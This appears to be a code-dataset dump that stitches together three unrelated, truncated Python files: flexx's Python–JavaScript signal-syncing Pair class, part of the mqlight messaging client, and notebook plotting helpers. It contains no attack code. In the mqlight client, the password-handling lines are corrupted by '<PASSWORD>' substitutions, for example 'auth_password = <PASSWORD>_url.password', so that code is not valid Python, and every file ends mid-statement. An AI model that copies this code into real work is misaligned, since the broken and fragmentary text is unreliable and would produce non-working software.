input stringlengths 2.65k 237k | output stringclasses 1
value |
|---|---|
<filename>flexx/app/pair.py
"""
Base class for objects that live in both Python and JS.
This basically implements the syncing of signals.
"""
import sys
import json
import weakref
import hashlib
from .. import react
from ..react.hassignals import HasSignalsMeta, with_metaclass
from ..react.pyscript import create_js_signals_class, HasSignalsJS
from ..pyscript.functions import py2js, js_rename
from ..pyscript.parser2 import get_class_definition
from .serialize import serializer
if sys.version_info[0] >= 3:
string_types = str,
else: # pragma: no cover
string_types = basestring,
pair_classes = []
def get_pair_classes():
    """ Return all known Pair subclasses.

    Walks the global HasSignals class registry and keeps only the
    classes that derive from Pair.
    """
    pairs = []
    for klass in HasSignalsMeta.CLASSES:
        if issubclass(klass, Pair):
            pairs.append(klass)
    return pairs
def get_instance_by_id(id):
    """ Look up a live Pair instance by its unique id.

    Returns None when no instance with that id exists (e.g. because it
    was garbage collected; the registry holds weak references).
    """
    try:
        return Pair._instances[id]
    except KeyError:
        return None
import json
class JSSignal(react.SourceSignal):
    """ A signal that represents a proxy to a signal in JavaScript.

    The Python side holds an identity pass-through function; actual
    values are pushed in from JS. Linking to the JS signal is done
    lazily, on first subscription.
    """

    def __init__(self, func_or_name, upstream=[], frame=None, ob=None, doc=None):
        # NOTE(review): upstream/frame are accepted for signature
        # compatibility with react.Signal but are not used here; the
        # mutable default [] is never mutated. TODO confirm intent.

        # Identity function: the JS side supplies the real values.
        def func(v):
            return v

        if doc is not None:
            func.__doc__ = doc
        if isinstance(func_or_name, string_types):
            func.__name__ = func_or_name
        else:
            func.__name__ = func_or_name.__name__
        # NOTE(review): _linked is initialized False but never set True
        # in this class — presumably the owning Pair updates it;
        # otherwise the unlink branch in _unsubscribe never fires.
        self._linked = False
        react.SourceSignal.__init__(self, func, [], ob=ob)

    def _subscribe(self, *args):
        # On first subscription, ask the owning Pair to create the
        # Py<->JS link for this signal.
        react.SourceSignal._subscribe(self, *args)
        if not self._linked:
            self.__self__._link_js_signal(self.name)

    def _unsubscribe(self, *args):
        # Drop the link once nothing downstream listens anymore.
        react.SourceSignal._unsubscribe(self, *args)
        if self._linked and not self._downstream:
            self.__self__._link_js_signal(self.name, False)
class PySignal(react.SourceSignal):
    """ A signal in JS that represents a proxy to a signal in Python.

    The wrapped function is an identity pass-through; its ``_name``
    attribute records the name of the Python signal being proxied.
    """

    def __init__(self, name):
        # Identity function: Python pushes the actual values across.
        def func(v):
            return v

        func._name = name
        react.SourceSignal.__init__(self, func, [])


class PyInputSignal(PySignal):
    """ A signal in JS that represents an input signal in Python. On
    the JS side, this can be used as an input too, although there is
    no validation in this case.
    """
    pass
class PairMeta(HasSignalsMeta):
    """ Meta class for Pair.

    For each Pair subclass this metaclass:

    * creates Python-side JSSignal proxies for signals defined on the
      inner ``JS`` class;
    * builds the effective inner ``JS`` class, implicitly inheriting
      from the ``JS`` classes of the Python bases;
    * creates JS-side PySignal/PyInputSignal proxies for signals
      defined on the Python class;
    * generates the JavaScript source (stored on ``JS.CODE``) and the
      class CSS.
    """

    def __init__(cls, name, bases, dct):
        HasSignalsMeta.__init__(cls, name, bases, dct)
        # The only dunder names copied onto the generated JS class.
        OK_MAGICS = '__init__', '__json__', '__from_json__'
        # Create proxy signals on cls for each signal on JS
        if 'JS' in cls.__dict__:
            for name, val in cls.JS.__dict__.items():
                if isinstance(val, react.Signal) and not isinstance(val, PySignal):
                    if not hasattr(cls, name):
                        cls.__signals__.append(name)
                        setattr(cls, name, JSSignal(name, doc=val._func.__doc__))
                    elif isinstance(getattr(cls, name), JSSignal):
                        pass  # ok, overloaded signal on JS side
                    else:
                        print('Warning: JS signal %r not proxied, as it would hide a Py attribute.' % name)
        # Implicit inheritance for JS "sub"-class: derive a fresh JS
        # class from the JS classes of all bases that define one.
        jsbases = [getattr(b, 'JS') for b in cls.__bases__ if hasattr(b, 'JS')]
        JS = type('JS', tuple(jsbases), {})
        for c in (cls, ):  # cls.__bases__ + (cls, ):
            if 'JS' in c.__dict__:
                if '__init__' in c.JS.__dict__:
                    JS.__init__ = c.JS.__init__
                # Copy over non-dunder attributes, plus allowed magics.
                for name, val in c.JS.__dict__.items():
                    if not name.startswith('__'):
                        setattr(JS, name, val)
                    elif name in OK_MAGICS:
                        setattr(JS, name, val)
        cls.JS = JS
        # Create proxy signals on cls.JS for each signal on cls
        for name, val in cls.__dict__.items():
            if isinstance(val, react.Signal) and not isinstance(val, JSSignal):
                if not hasattr(cls.JS, name):
                    # Input signals get a writable JS-side proxy.
                    if isinstance(val, react.InputSignal):
                        setattr(cls.JS, name, PyInputSignal(name))
                    else:
                        setattr(cls.JS, name, PySignal(name))
                elif isinstance(getattr(cls.JS, name), PySignal):
                    pass  # ok, overloaded signal on JS side
                else:
                    print('Warning: Py signal %r not proxied, as it would hide a JS attribute.' % name)
        # Set JS and CSS for this class
        cls.JS.CODE = cls._get_js()
        cls.CSS = cls.__dict__.get('CSS', '')

    def _get_js(cls):
        """ Get the JavaScript source code for this class.

        When this is the Pair base class itself (its direct base is
        HasSignals), the JS versions of the serializer and HasSignals
        are prepended so the generated code is self-contained.
        """
        cls_name = 'flexx.classes.' + cls.__name__
        base_class = 'flexx.classes.%s.prototype' % cls.mro()[1].__name__
        code = []
        # Add JS version of HasSignals when this is the Pair class
        if cls.mro()[1] is react.HasSignals:
            c = py2js(serializer.__class__, 'flexx.Serializer')
            code.append(c)
            code.append('flexx.serializer = new flexx.Serializer();')
            c = js_rename(HasSignalsJS.JSCODE, 'HasSignalsJS', 'flexx.classes.HasSignals')
            code.append(c)
        # Add this class
        code.append(create_js_signals_class(cls.JS, cls_name, base_class))
        if cls.mro()[1] is react.HasSignals:
            code.append('flexx.serializer.add_reviver("Flexx-Pair", flexx.classes.Pair.prototype.__from_json__);\n')
        return '\n'.join(code)
class Pair(with_metaclass(PairMeta, react.HasSignals)):
""" Subclass of HasSignals representing Python-JavaScript object pairs
Each instance of this class has a corresponding object in
JavaScript, and their signals are synced both ways. Signals defined
in Python can be connected to from JS, and vice versa.
The JS version of this class is defined by the contained ``JS``
class. One can define methods, signals, and (json serializable)
constants on the JS class.
Note:
This class may be renamed. Maybe Object, PairObject, ModelView
or something, suggestion welcome.
Parameters:
proxy: the proxy object that connects this instance to a JS client.
kwargs: initial signal values (see HasSignals).
Notes:
This class provides the base object for all widget classes in
``flexx.ui``. However, one can also create subclasses that have
nothing to do with user interfaces or DOM elements. You could e.g.
use it to calculate pi on nodejs.
Example:
.. code-block:: py
class MyPair(Pair):
def a_python_method(self):
...
class JS:
FOO = [1, 2, 3]
def a_js_method(this):
...
"""
# Keep track of all instances, so we can easily collect al JS/CSS
_instances = weakref.WeakValueDictionary()
# Count instances to give each instance a unique id
_counter = 0
# CSS for this class (no css in the base class)
CSS = ""
def __json__(self):
    # Serialize as a reference: only the type tag and id cross the wire.
    return {'__type__': 'Flexx-Pair', 'id': self.id}

def __from_json__(dct):
    # Note: deliberately no 'self' — the serializer calls this as a
    # plain function to revive a reference into the live instance.
    return get_instance_by_id(dct['id'])
def __init__(self, proxy=None, **kwargs):
    """ Create the Python side of the pair, instantiate the JS
    counterpart via the proxy, then initialize the signals.
    """
    # Set id and register this instance (weak ref, so it can be GC'd)
    Pair._counter += 1
    self._id = self.__class__.__name__ + str(Pair._counter)
    Pair._instances[self._id] = self
    # Flag to implement eventual synchronicity: holds the esid of the
    # last signal update received from JS (0 = originated in Python)
    self._seid_from_js = 0
    # Init proxy; fall back to the application's default proxy
    if proxy is None:
        from .proxy import manager  # local import; presumably avoids a cycle
        proxy = manager.get_default_proxy()
    self._proxy = proxy
    self._proxy.register_pair_class(self.__class__)
    # Instantiate JavaScript version of this class
    clsname = 'flexx.classes.' + self.__class__.__name__
    cmd = 'flexx.instances.%s = new %s(%r);' % (self._id, clsname, self._id)
    self._proxy._exec(cmd)
    self._init()
    # Init signals - signals will be connected updated, causing updates
    # on the JS side.
    react.HasSignals.__init__(self, **kwargs)
def _init(self):
    """ Can be overloaded when creating a custom class.

    Called from __init__ after the JS counterpart exists, but before
    the signals are initialized.
    """
    pass

@property
def id(self):
    """ The unique id of this Pair instance (class name + counter). """
    return self._id

@property
def proxy(self):
    """ The proxy object that connects this instance to the runtime. """
    return self._proxy
def __setattr__(self, name, value):
    # Sync attributes that are Pair instances: mirror the reference on
    # the JS counterpart so JS code can reach the other object too.
    react.HasSignals.__setattr__(self, name, value)
    if isinstance(value, Pair):
        txt = serializer.saves(value)
        cmd = 'flexx.instances.%s.%s = flexx.serializer.loads(%r);' % (self._id, name, txt)
        self._proxy._exec(cmd)
def _set_signal_from_js(self, name, text, esid):
    """ Apply a signal update received from the JS side.

    Notes on synchronizing:
    - Py and JS both send updates when a signal changes.
    - JS does not send an update for signal updates received from Py.
    - Py does, to allow eventual synchronicity. Read on.
    - JS sends updates with a nonzero esid (eventual synchronicity
      id) and marks the corresponding signal with the same id.
    - Py sends an update with the esid that it got from JS, or 0
      if the signal originates from Py.
    - When JS receives an update from Py, it checks whether the
      esid is 0 (the signal originates from Py) or if the signal
      esid is 0 (the signal was updated from py since we last
      updated it from JS). If either is 0, it updates the signal
      value, and sets the signal esid to 0.
    """
    signal = getattr(self, name)
    value = serializer.loads(text)
    self._seid_from_js = esid  # echoed back to JS by _signal_changed
    signal._set(value)
def _signal_changed(self, signal):
    """ Push a changed Python signal value to the JS counterpart. """
    # Echo back the esid received from JS (0 when the change
    # originated in Python), and reset the flag in the same step.
    esid, self._seid_from_js = self._seid_from_js, 0
    if isinstance(signal, JSSignal):
        return  # JS proxies originate in JS; never echo them back
    payload = serializer.saves(signal.value)
    command = 'flexx.instances.%s._set_signal_from_py(%r, %r, %r);' % (
        self._id, signal.name, payload, esid)
    self._proxy._exec(command)
def _link_js_signal(self, name, link=True):
    """ Create (or remove, when ``link`` is False) the link between a
    JS signal and its proxy in Python. Invoked when the proxy signal
    is used as input for a signal in Python.
    """
    if link:
        js_bool = 'true'
    else:
        js_bool = 'false'
    self._proxy._exec('flexx.instances.%s._link_js_signal(%r, %s);'
                      % (self._id, name, js_bool))
def call_js(self, call):
    """ Execute a call on the JS counterpart of this object.

    ``call`` is a JS snippet like ``"foo(1, 2)"`` that is applied to
    the instance, i.e. it runs ``flexx.instances.<id>.<call>;``.
    """
    command = 'flexx.instances.%s.%s;' % (self._id, call)
    self._proxy._exec(command)
class JS:
def __json__(self):
return {'__type__': 'Flexx-Pair', 'id': self.id}
def __from_json__(dct):
return flexx.instances[dct.id]
def __init__(self, id):
# Set id alias. In most browsers this shows up as the first element
# of | |
<filename>mqlight/client.py<gh_stars>10-100
# python-mqlight - high-level API by which you can interact with MQ Light
#
# Copyright 2015-2017 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
mqlight
~~~~~~~
MQ Light is designed to allow applications to exchange discrete pieces of
information in the form of messages. This might sound a lot like TCP/IP
networking, and MQ Light does use TCP/IP under the covers, but MQ Light takes
away much of the complexity and provides a higher level set of abstractions to
build your applications with.
"""
from __future__ import division, absolute_import
import sys
import uuid
import threading
import os.path
import codecs
import time
import inspect
import re
from json import loads, dumps
from random import random
from pkg_resources import get_distribution, DistributionNotFound
from .utils import ManagedList, \
SubscriptionRecord, SubscriptionRecordBuild, \
UnsubscriptionRecord, UnsubscriptionRecordBuild, \
SendRecord, SendRecordBuild, decode_link_address, \
validate_callback_function, Security, Service, \
ServiceGenerator, hide_password, is_text
import ssl
try:
import httplib
from urlparse import urlparse
from urllib import quote, quote_plus
except ImportError:
import http.client as httplib
from urllib.parse import urlparse
from urllib.parse import quote, quote_plus
from .exceptions import MQLightError, InvalidArgumentError, \
NetworkError, NotPermittedError, ReplacedError, \
StoppedError, SubscribedError, UnsubscribedError, SecurityError, \
InternalError
from .logging import get_logger, NO_CLIENT_ID
from .definitions import QOS_AT_MOST_ONCE, QOS_AT_LEAST_ONCE
PYTHON2 = sys.version_info < (3, 0)
PYTHON3 = sys.version_info >= (3, 0)
if PYTHON3:
from queue import Queue, Empty
from importlib import reload
else:
from Queue import Queue, Empty
from exceptions import SystemExit
CMD = ' '.join(sys.argv)
if 'setup.py test' in CMD \
or 'py.test' in CMD \
or 'unittest' in CMD \
or 'runfiles.py' in CMD:
from .stubmqlproton import _MQLightMessage, \
_MQLightMessenger, _MQLightSocket
else:
from .mqlproton import _MQLightMessenger, _MQLightMessage, _MQLightSocket
# The connection retry interval in seconds
if PYTHON2:
reload(sys)
sys.setdefaultencoding('utf8')
try:
__version__ = get_distribution('mqlight').version
except DistributionNotFound:
__version__ = 1.0
# Set up logging (to stderr by default). The level of output is
# configured by the value of the MQLIGHT_NODE_LOG environment
# variable. The default is 'ffdc'.
LOG = get_logger(__name__)
LOG.show_trace_header()
# Regex for the client id
INVALID_CLIENT_ID_REGEX = r'[^A-Za-z0-9%/\._]'
STARTED = 'started'
STARTING = 'starting'
STOPPED = 'stopped'
STOPPING = 'stopping'
RETRYING = 'retrying'
ERROR = 'error'
MESSAGE = 'message'
MALFORMED = 'malformed'
DRAIN = 'drain'
STATES = (
STARTED,
STARTING,
STOPPED,
STOPPING,
RETRYING
)
CONNECT_RETRY_INTERVAL = 1
class ActiveClients(object):
    """
    Set of active clients, keyed by client id.
    """

    def __init__(self):
        self.clients = {}

    def add(self, client):
        """
        Add client to set, replacing any client with the same id.
        """
        self.clients[client.get_id()] = client

    def remove(self, client_id):
        """
        Remove client from set; a no-op when the id is not present.
        """
        self.clients.pop(client_id, None)

    def get(self, client_id):
        """
        Get client from set, or None when the id is not present.
        """
        # dict.get avoids the previous has()+[] double lookup
        return self.clients.get(client_id)

    def has(self, client_id):
        """
        Return True if the specified client is in the set.
        """
        return client_id in self.clients
def _should_reconnect(error):
    """
    Generic helper method to determine if we should automatically reconnect
    for the given type of error.

    Returns True unless the error is one of the listed 'permanent'
    types (argument/usage errors and deliberate state changes), for
    which a reconnect cannot help.
    """
    LOG.entry('_should_reconnect', NO_CLIENT_ID)
    LOG.parms(NO_CLIENT_ID, 'error:', type(error))
    # NetworkError is deliberately absent: network failures are exactly
    # the transient case where reconnecting may succeed.
    result = not isinstance(error, (
        TypeError,
        InvalidArgumentError,
        NotPermittedError,
        ReplacedError,
        StoppedError,
        SubscribedError,
        UnsubscribedError,
        SecurityError))
    LOG.exit('_should_reconnect', NO_CLIENT_ID, result)
    return result
def _get_http_service_function(http, http_url):
    """
    Function to take a single HTTP URL and using the JSON retrieved from it to
    return an array of service URLs.

    Returns a closure of one argument (callback). The callback is
    invoked as callback(error, service): on success error is None and
    service is the value of the 'service' key of the fetched JSON (or
    None when that key is absent); on failure error is set and service
    is None. Errors are reported via the callback, not raised.
    """
    LOG.entry('_get_http_service_function', NO_CLIENT_ID)
    LOG.parms(NO_CLIENT_ID, 'http:', http)
    LOG.parms(NO_CLIENT_ID, 'http_url:', http_url)

    def _http_service_function(callback):
        LOG.entry('_http_service_function', NO_CLIENT_ID)
        LOG.parms(NO_CLIENT_ID, 'callback:', callback)
        # Pick plain or TLS connection based on the URL scheme
        func = httplib.HTTPConnection
        if http_url.scheme == 'https':
            func = httplib.HTTPSConnection
        LOG.data(NO_CLIENT_ID, 'using :', func.__name__)
        host = http_url.netloc
        # NOTE(review): netloc already includes ':port' when a port is
        # present, so this appends the port a second time — confirm
        # against the expected service-lookup URL format.
        if http_url.port:
            host += ':{0}'.format(http_url.port)
        LOG.data(NO_CLIENT_ID, 'host:', host)
        # Everything after the netloc in the original URL (path+query)
        path = http[http.index(http_url.netloc) + len(http_url.netloc):]
        LOG.data(NO_CLIENT_ID, 'path:', path)
        try:
            conn = func(host)
            conn.request('GET', path)
            res = conn.getresponse()
            if res.status == httplib.OK:
                try:
                    json_obj = loads(res.read())
                    if 'service' in json_obj:
                        service = json_obj['service']
                    else:
                        service = None
                    callback(None, service)
                except Exception as exc:
                    # Body fetched but not valid JSON
                    err = TypeError(
                        '{0} request to {1} returned '
                        'unparseable JSON: {2}'.format(
                            http_url.scheme, http, exc))
                    LOG.error('_http_service_function', NO_CLIENT_ID, err)
                    callback(err, None)
            else:
                # Non-200 status from the service endpoint
                err = NetworkError(
                    '{0} request to {1} failed with a status code '
                    'of {2}'.format(http_url.scheme, http, res.status))
                LOG.error('_http_service_function', NO_CLIENT_ID, err)
                callback(err, None)
        except httplib.HTTPException as exc:
            # Connection-level failure
            err = NetworkError(
                '{0} request to {1} failed: {2}'.format(
                    http_url.scheme, http, exc))
            LOG.error('_http_service_function', NO_CLIENT_ID, err)
            callback(err, None)
        LOG.exit('_http_service_function', NO_CLIENT_ID, None)
    LOG.exit(
        '_get_http_service_function',
        NO_CLIENT_ID,
        _http_service_function)
    return _http_service_function
def _get_file_service_function(file_url):
    """
    Function to take a single FILE URL and using the JSON retrieved from it to
    return an array of service URLs.

    Returns a closure of one argument (callback). The callback is
    invoked as callback(error, service): on success error is None and
    service is the value of the 'service' key of the file's JSON (or
    None when that key is absent); on failure error is set and service
    is None.

    Raises:
        TypeError: if file_url is not a string.
    """
    LOG.entry('_get_file_service_function', NO_CLIENT_ID)
    LOG.parms(NO_CLIENT_ID, 'file_url:', file_url)
    if not isinstance(file_url, str):
        err = TypeError('file_url must be a string')
        LOG.error('_get_file_service_function', NO_CLIENT_ID, err)
        raise err
    file_path = file_url
    # Special case for windows drive letters in file URIS, trim the leading /
    if os.name == 'nt' and re.match(r'^\/[a-zA-Z]:\/', file_path):
        file_path = file_path[1:]

    def _file_service_function(callback):
        LOG.entry('_file_service_function', NO_CLIENT_ID)
        LOG.parms(NO_CLIENT_ID, 'callback:', callback)
        # BUG FIX: previously a failure to open the file raised out of
        # this function instead of being reported through the callback
        # (the 'opened' flag made the failure branch unreachable, and
        # the explicit close() inside the 'with' was redundant).
        try:
            with codecs.open(file_path, encoding='utf-8', mode='r') as file_obj:
                content = file_obj.read()
        except EnvironmentError:
            err = MQLightError(
                'attempt to read {0} failed'.format(file_path))
            LOG.error('_file_service_function', NO_CLIENT_ID, err)
            callback(err, None)
        else:
            try:
                json_obj = loads(content)
                if 'service' in json_obj:
                    service = json_obj['service']
                else:
                    service = None
                LOG.data(NO_CLIENT_ID, 'service:', service)
                callback(None, service)
            except Exception as exc:
                err = MQLightError(
                    'The content read from {0} contained '
                    'unparseable JSON: {1}'.format(file_path, exc))
                LOG.error('_file_service_function', NO_CLIENT_ID, err)
                callback(err, None)
        LOG.exit('_file_service_function', NO_CLIENT_ID, None)
    LOG.exit(
        '_get_file_service_function',
        NO_CLIENT_ID,
        _file_service_function)
    return _file_service_function
def _generate_service_list(service, security_options):
"""
Function to take a single service URL, or list of service URLs, validate
them, returning a list of service URLs
"""
LOG.entry('_generate_service_list', NO_CLIENT_ID)
LOG.parms(NO_CLIENT_ID, 'security_options:', security_options)
# Ensure the service is a list
input_service_list = []
if not service:
error = TypeError('service is undefined')
LOG.error('_generate_service_list', NO_CLIENT_ID, error)
raise error
elif hasattr(service, '__call__'):
error = TypeError('service cannot be a function')
LOG.error('_generate_service_list', NO_CLIENT_ID, error)
raise error
elif isinstance(service, list):
if not service:
error = TypeError('service array is empty')
LOG.error('_generate_service_list', NO_CLIENT_ID, error)
raise error
input_service_list = service
elif isinstance(service, str):
input_service_list = [service]
else:
error = TypeError('service must be a str or list type')
LOG.error('_generate_service_list', NO_CLIENT_ID, error)
raise error
# Validate the list of URLs for the service, inserting default values as
# necessary Expected format for each URL is: amqp://host:port or
# amqps://host:port (port is optional, defaulting to 5672 or 5671 as
# appropriate)
service_list = []
auth_user = None
auth_password = <PASSWORD>
for i, service in enumerate(input_service_list):
service_url = urlparse(service)
protocol = service_url.scheme
# Check for auth details
if service_url.username:
if service_url.password:
auth_user = service_url.username
auth_password = <PASSWORD>_url.password
else:
error = InvalidArgumentError(
'URLs supplied via the service property must specify both '
'a user name and a password value, or omit both values')
LOG.error('_generate_service_list', NO_CLIENT_ID, error)
raise error
user = security_options.user
if user and user != auth_user:
error = InvalidArgumentError(
'User name supplied as user property '
'security_options.user does not match '
'username supplied via a URL passed via the '
'service property {0}'.format(auth_user))
LOG.error('_generate_service_list', NO_CLIENT_ID, error)
raise error
password = <PASSWORD>
if password and password != <PASSWORD>_password:
error = InvalidArgumentError(
'Password name supplied as password property '
'security_options.password does not match '
'password supplied via a URL passed via the '
'service property {0}'.format(auth_password))
LOG.error('_generate_service_list', NO_CLIENT_ID, error)
raise error
if i == 0:
security_options.url_user = auth_user
security_options.url_password = <PASSWORD>
# Check whatever URL user names / passwords are present this
# time through the loop - match the ones set on security_options
# by the first pass through the loop.
if i > 0:
if security_options.url_user != auth_user:
error = InvalidArgumentError(
'URLs supplied via the service property contain '
'inconsistent username values')
LOG.error('_generateServiceList', NO_CLIENT_ID, error)
raise error
elif security_options.url_password != <PASSWORD>:
error = InvalidArgumentError(
'URLs supplied via the service property contain '
'inconsistent password values')
LOG.error('_generateServiceList', NO_CLIENT_ID, error)
raise error
# Check we are trying to use the amqp protocol
if protocol not in ('amqp', 'amqps'):
error = InvalidArgumentError(
'Unsupported URL {0} specified for service. '
'Only the amqp or amqps protocol are supported.'.format(
service))
LOG.error('_generate_service_list', NO_CLIENT_ID, error)
raise error
# Check we have a hostname
host = service_url.hostname
if not host:
error = InvalidArgumentError(
'Unsupported | |
<filename>notebooks/utils.py
import matplotlib
import matplotlib.pyplot as plt
import matplotlib.lines as mlines
import numpy as np
import pandas as pd
from collections import OrderedDict
from cycler import cycler
import warnings
warnings.filterwarnings('ignore')
matplotlib.style.use('ggplot')
matplotlib.rcParams['axes.facecolor'] = 'white'
matplotlib.rcParams['axes.edgecolor'] = 'black'
# plt.rc('axes', color_cycle=['royalblue', 'orange', 'green', 'red', 'blueviolet', 'sienna', 'hotpink', 'gray', 'y', 'c'])
# plt.rc('axes', color_cycle=['royalblue', 'green', 'sienna', 'c', 'orange', 'red', 'blueviolet', 'hotpink', 'gray', 'y'])
plt.rc('axes', prop_cycle=cycler(color=['royalblue', 'green', 'sienna', 'c', 'orange', 'red', 'blueviolet', 'hotpink', 'gray', 'y']))
# axes.prop_cycle : cycler('color', ['b', 'g', 'r', 'c', 'm', 'y', 'k'])
def getari_for_latent_space(X, truelabels):
    """ Cluster the latent space with k-means (k=10, fixed seed) and
    return the adjusted Rand index against the true labels. """
    from sklearn.cluster import KMeans
    from sklearn.metrics.cluster import adjusted_rand_score
    fitted = KMeans(n_clusters=10, random_state=0).fit(X)
    # Shift cluster ids to 1..10 to match the 1-based true labels
    # (ARI itself is invariant to relabeling).
    predicted = fitted.labels_ + 1
    fitted.labels_ = predicted
    return adjusted_rand_score(truelabels, predicted)
def calcroughness(x, pt):
    """ Roughness of expression profiles ordered by pseudotime.

    Rows of ``x`` are profiles; ``pt`` gives the pseudotime used to
    order the columns. Per row, returns the RMS of successive
    differences divided by the row's standard deviation.
    """
    profiles = np.atleast_2d(x)[:, np.argsort(pt)]
    n = profiles.shape[1]
    assert n > 0
    steps = np.diff(profiles, axis=1)
    rms_step = np.sqrt(np.square(steps).sum(axis=1) / (n - 1))
    return rms_step / profiles.std(axis=1)
def cbtime_to_tau(pTime, startTime, endTime, timeDiff):
    """ Map a cyclebase time (percent of the cell cycle, 0-100) onto
    the pseudotime interval [startTime, endTime), wrapping around the
    cycle; the half capture offset shifts the origin.
    """
    span = endTime - startTime
    tau = pTime * span / 100. + (startTime + timeDiff / 2.)
    if tau >= endTime:
        tau = tau - span
    return tau
def tau_to_cbtime(tau, startTime, endTime, timeDiff):
    """ Map a pseudotime value back to a cell-cycle percentage
    (0-100); the inverse of ``cbtime_to_tau``. """
    span = endTime - startTime
    shifted = tau - (startTime + timeDiff / 2.)
    if shifted <= 0.:
        shifted = shifted + span
    percent = shifted * 100. / span
    if percent > 100:
        percent = np.abs(100 - percent)
    return percent
def plot(title, xLabel, yLabel, xData, yData, cpt, xErr=None, **kwargs):
    """ Scatter plot of (xData, yData), colored by cell capture time.

    Parameters:
        title, xLabel, yLabel: plot labels.
        xData, yData: point coordinates, one per cell.
        cpt: per-cell capture time; values {6, 18, 30, 42} by default,
            or ordinal stages 1..4 when 'datset' is given in kwargs.
        xErr: optional horizontal error bars.
        kwargs: presence of the key 'datset' (note the spelling)
            switches to the 0/2/4/7 capture-stage legend.
    """
    plt.rcParams['axes.facecolor'] = 'white'
    plt.rcParams['axes.edgecolor'] = 'black'
    plt.title('%s' % (title))
    plt.xlabel('%s' % (xLabel), fontsize=16)
    plt.ylabel('%s' % (yLabel), fontsize=16)
    # Legend entries (capture label -> color), in display order
    cellCapture = OrderedDict((('6', 'red'), ('18', 'green'), ('30', 'blue'), ('42', 'orange')))
    color_map = [0 for i in range(len(cpt))]
    for i in range(0, len(cpt)):
        if cpt[i] == 6:
            color_map[i] = 'red'
        elif cpt[i] == 18:
            color_map[i] = 'green'
        elif cpt[i] == 30:
            color_map[i] = 'blue'
        else:
            color_map[i] = 'orange'
    if 'datset' in kwargs:
        # Alternative dataset: capture stages are coded 1..4
        cellCapture = OrderedDict((('0', 'red'), ('2', 'green'), ('4', 'blue'), ('7', 'orange')))
        for i in range(0, len(cpt)):
            if cpt[i] == 1:
                color_map[i] = 'red'
            elif cpt[i] == 2:
                color_map[i] = 'green'
            elif cpt[i] == 3:
                color_map[i] = 'blue'
            else:
                color_map[i] = 'orange'
    # Proxy artists so the legend shows one marker per capture time
    markers = [plt.Line2D([0, 0], [0, 0], color=color, marker='o', ms=10, linestyle='') for color in cellCapture.values()]
    plt.scatter(xData, yData, 100, c=color_map, alpha=0.6)
    if xErr is not None:
        plt.errorbar(xData, yData, xerr=xErr, fmt='none', marker='none', ecolor=color_map)
    l = plt.legend(markers, cellCapture.keys(), numpoints=1, title='Capture', loc=4, fontsize=16)
    plt.setp(l.get_title(), fontsize=16)
def plot_comparison(plotDf, dataset='Windram'):
    """ Two-panel comparison of BGPLVM against the DeLorean model.

    Left panel: Spearman correlation of inferred pseudotime vs number
    of inducing points; right panel: fitting time. ``plotDf`` must
    provide columns inducingPoints, sMean, sBest, GPLVM_avg,
    GPLVM_best, timeDeLorean and GPLVM_fitting_time.
    ``dataset`` is currently unused (the title is fixed).
    """
    plt.rcParams['axes.facecolor'] = 'white'
    plt.rcParams['axes.edgecolor'] = 'black'
    title = 'Comparision to the DeLorean Model'
    xLabel = 'Number of inducing points'
    fig, ax = plt.subplots(nrows=1, ncols=2, sharex=True, figsize=(16, 6))
    # Convention: DeLorean in red/dashed, BGPLVM in green/solid
    ax[0].plot(plotDf.inducingPoints, plotDf['sMean'], linestyle='--', color='r', linewidth=3.)
    ax[0].plot(plotDf.inducingPoints, plotDf['sMean'], 'rs', markersize=8)
    ax[0].plot(plotDf.inducingPoints, plotDf['sBest'], '--', color='r', linewidth=3.)
    ax[0].plot(plotDf.inducingPoints, plotDf['GPLVM_avg'], color='g', linewidth=3.)
    ax[0].plot(plotDf.inducingPoints, plotDf['GPLVM_best'], 'go', markersize=8)
    ax[0].plot(plotDf.inducingPoints, plotDf['GPLVM_best'], color='g', linewidth=3.)
    ax[0].set_ylabel('Spearman Correlation', fontsize=16)
    ax[1].plot(plotDf.inducingPoints, plotDf['timeDeLorean'], linestyle='--', color='r', linewidth=2.5)
    ax[1].plot(plotDf.inducingPoints, plotDf['GPLVM_fitting_time'], color='g', linewidth=2.5)
    ax[1].set_ylabel('Fitting time (s)', fontsize=16)
    plt.suptitle(title, fontsize=20)
    fig.text(0.5, 0.04, xLabel, ha='center', va='center', fontsize=16)
    plt.xticks(plotDf.inducingPoints)
    # Hand-built legend handles: one legend for the correlation panel,
    # one for the timing panel
    blue_line = mlines.Line2D([], [], color='green', linewidth=3., label='BGPLVM(Best)')
    red_line = mlines.Line2D([], [], color='red', linestyle='--', linewidth=3., label='DeLorean(Best)')
    dashed1 = mlines.Line2D([], [], color='red', marker='s', markersize=8, linestyle='--', linewidth=3.,
                            label='DeLorean(Avg)')
    dashed2 = mlines.Line2D([], [], color='green', marker='o', markersize=8, linewidth=3., label='BGPLVM(Avg)')
    l1 = plt.legend(handles=[red_line, blue_line, dashed1, dashed2], numpoints=1, bbox_to_anchor=(-0.4, 0.4), loc=10,
                    fontsize=12)
    red_line_dotted = mlines.Line2D([], [], color='red', linestyle='--', linewidth=2.5, label='DeLorean')
    green_line_solid = mlines.Line2D([], [], color='green', linewidth=2.5, label='BGPLVM')
    l2 = plt.legend(handles=[red_line_dotted, green_line_solid], numpoints=1, bbox_to_anchor=(0.8, 0.4), loc=10,
                    fontsize=12)
    fig.gca().add_artist(l1)
    fig.gca().add_artist(l2)
def plot_fitting_time_comparison(plotDf):
    """ Plot fitting time vs number of inducing points: DeLorean in
    red/dashed, BGPLVM in green/solid. """
    plt.rcParams['axes.facecolor'] = 'white'
    plt.rcParams['axes.edgecolor'] = 'black'
    plt.figure(figsize=(8, 8))
    plt.plot(plotDf['inducingPoints'], plotDf['timeDeLorean'], linestyle='--', linewidth=2.5, color='r')
    plt.plot(plotDf['inducingPoints'], plotDf['GPLVM_fitting_time'], linewidth=2.5, color='g')
    _ = plt.ylabel('Fitting time (s)', fontsize=16)
    _ = plt.xlabel('Number of inducing points', fontsize=16)
    _ = plt.xticks(plotDf['inducingPoints'], fontsize=12)
    _ = plt.yticks(fontsize=12)
    # Hand-built legend handles (the data lines carry no labels)
    green_line = mlines.Line2D([], [], color='green', linewidth=2.5, label='BGPLVM')
    red_line = mlines.Line2D([], [], color='red', linestyle='--', linewidth=2.5, label='DeLorean')
